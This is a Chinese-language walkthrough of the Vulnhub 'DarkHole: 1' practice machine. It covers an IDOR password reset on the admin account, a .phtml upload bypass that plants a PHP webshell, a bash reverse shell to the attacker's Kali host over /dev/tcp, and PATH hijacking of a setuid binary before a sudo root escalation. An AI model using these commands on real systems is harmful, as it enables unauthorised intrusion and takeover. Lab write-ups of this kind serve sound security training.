Vulnhub-DarkHole_1-Writeup
靶機地址:DARKHOLE: 1
Difficulty: Easy
掃描與發現
使用arp-scan發現目標IP
arp-scan -l
使用nmap掃描開放埠
nmap -sV -p- 192.168.164.193
目標探索
打開目標80埠發現沒什么東西,查看源代碼也沒什么,只有一個登錄連接
我們點進登錄頁面
想到可能是SQL注入,但是嘗試之后沒有結果,發現可以注冊,輸入用戶名郵箱密碼很容易可以注冊成功,立馬想到這里可能存在邏輯漏洞,登錄之后是這樣的
web shell
這里有更新資料功能,打開Burpsuite工具進行抓包,嘗試修改admin用戶的資訊,設定用戶名為admin,密碼自己設定一個,比如123123,然后點擊修改密碼,抓包
資料包如下
這里應該是通過引數id值來修改對應用戶密碼的,我們將id值改為1,對應修改成admin密碼,放出資料包提示密碼修改成功,然后我們用admin賬戶登錄,密碼123123,登錄成功,界面如下,
admin登錄后多出來一個Upload功能,應該是利用檔案上傳拿到網站shell,經過探索后發現可以通過后綴.phtml繞過上傳php腳本,可以上傳一句話木馬然后用蟻劍連接,獲得虛擬終端
利用bash,反彈一個shell給kali
bash -c 'bash -i >& /dev/tcp/192.168.164.179/9999 0>&1'
用戶shell
來到/home/john目錄下發現有一個toto二進制檔案執行id命令
發現uid為john,可以利用環境變數來切換得到john用戶shell,在/tmp目錄下
echo "/bin/bash" > /tmp/id
chmod +x /tmp/id
export PATH=/tmp:$PATH
./toto
root權限
拿到john權限后查看password檔案,發現內容為root123
嘗試用該密碼進行ssh連接,發現可以連上darkhole用戶,利用sudo發現其可以升為root
直接利用sudo提權,拿到flag
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/373767.html
標籤:其他